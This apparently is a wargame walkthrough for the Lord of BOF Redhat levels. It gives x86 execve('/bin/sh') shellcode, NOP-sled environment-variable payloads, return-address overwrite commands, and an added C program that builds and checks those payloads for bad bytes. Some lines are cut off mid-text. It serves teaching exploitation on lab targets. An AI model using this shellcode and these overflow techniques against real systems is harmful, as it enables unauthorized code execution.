wargame/LOB Redhat

gremlin to cobolt

1. ret2libc

[gremlin@localhost gremlin]$ gdb -q cobolt
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 : push %ebp
0x8048431 : mov %ebp,%esp
0x8048433 : sub %esp,16
0x8048436 : cmp DWORD PTR [%ebp+8],1
0x804843a : jg 0x8048453
0x804843c : push 0x80484d0
0x8048441 : call 0x8048350
0x8048446 : add %esp,4
0x8048449 : push 0
0x804844b : call 0x8048360
0x804..

gate to gremlin

1. Attack using an environment variable

Run the following under bash2 (the default bash treats the bad character as a null and corrupts the payload):

export hack=`perl -e 'print "\x90"x100,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";'`

Small helper that prints where the named environment variable lives in the target's address space:

cat > env.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    /* argv[1] is the variable name; getenv() returns a pointer into the
     * environment block, which is where the NOP sled + shellcode now sits */
    printf("%p\n", getenv(argv[1]));
    return 0;
}
(Ctrl+D)

gcc -o env env.c
./env hack    // prints 0xbffffe30

Overwrite the return address of gremlin with that address (260 bytes of filler, then the address in little-endian byte order):

./gremlin `perl -e 'print "\x90"x260,"\x30\xfe\xff\x..
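The two perl one-liners above hide the details that usually break this attack: a 0x00 byte anywhere in the shellcode or address would truncate the argv/environment string, and the address 0xbffffe30 contains the 0xff byte that the old bash mangles. The following C program, added here as a worked example and not part of the original post, rebuilds both payloads from the page's values (100-NOP sled plus the 25-byte shellcode for the environment variable; 260 bytes of filler plus 0xbffffe30 for argv) and checks them for such bad bytes. Treating 0xff as the byte the default bash cannot pass is an assumption; the page does not name the bad character.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 25-byte execve("//bin/sh") shellcode, the same bytes the page exports in $hack. */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Assumed bad-char set for the old bash (the page only says "bash treats the
 * bad char as null"); 0xff is assumed here and is exactly the byte that occurs
 * in the return address 0xbffffe30. */
static const unsigned char bash1_bad[] = { 0xff };

/* Return the offset of the first byte of buf that is 0x00 (always fatal for a
 * string passed via argv or the environment) or that appears in the bad set,
 * or -1 if the buffer is clean. */
long first_bad_byte(const unsigned char *buf, size_t len,
                    const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    }
    return -1;
}

/* Environment payload: nop_count NOPs followed by the shellcode.
 * Returns the total length; *out is malloc'ed and owned by the caller. */
size_t build_env_payload(size_t nop_count, unsigned char **out)
{
    size_t len = nop_count + SHELLCODE_LEN;
    unsigned char *p = malloc(len);
    memset(p, 0x90, nop_count);
    memcpy(p + nop_count, shellcode, SHELLCODE_LEN);
    *out = p;
    return len;
}

/* argv payload: pad_len filler bytes (NOPs, as on the page) followed by the
 * 32-bit return address stored little-endian, i.e. 0xbffffe30 becomes
 * \x30\xfe\xff\xbf in memory. */
size_t build_argv_payload(size_t pad_len, uint32_t ret_addr, unsigned char **out)
{
    size_t len = pad_len + 4;
    unsigned char *p = malloc(len);
    memset(p, 0x90, pad_len);
    for (int i = 0; i < 4; i++)
        p[pad_len + i] = (unsigned char)((ret_addr >> (8 * i)) & 0xff);
    *out = p;
    return len;
}

/* Print a buffer in the "\xNN" form used by the page's perl one-liners. */
void print_hex_string(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        printf("\\x%02x", buf[i]);
    putchar('\n');
}

int main(void)
{
    unsigned char *env_p, *argv_p;
    size_t env_len = build_env_payload(100, &env_p);
    size_t argv_len = build_argv_payload(260, 0xbffffe30u, &argv_p);

    printf("shellcode %zu bytes, first NUL/bad byte: %ld\n", SHELLCODE_LEN,
           first_bad_byte(shellcode, SHELLCODE_LEN, bash1_bad, 1));
    printf("env payload %zu bytes, first bad byte under bash1 rules: %ld\n",
           env_len, first_bad_byte(env_p, env_len, bash1_bad, 1));
    printf("argv payload %zu bytes, first bad byte under bash1 rules: %ld\n",
           argv_len, first_bad_byte(argv_p, argv_len, bash1_bad, 1));
    printf("argv tail: ");
    print_hex_string(argv_p + 260, 4);

    free(env_p);
    free(argv_p);
    return 0;
}
```

The shellcode and the environment payload come back clean, while the argv payload reports a bad byte at offset 262 (the 0xff in the address); that is the reason the page switches to bash2 before running the export and the final ./gremlin line.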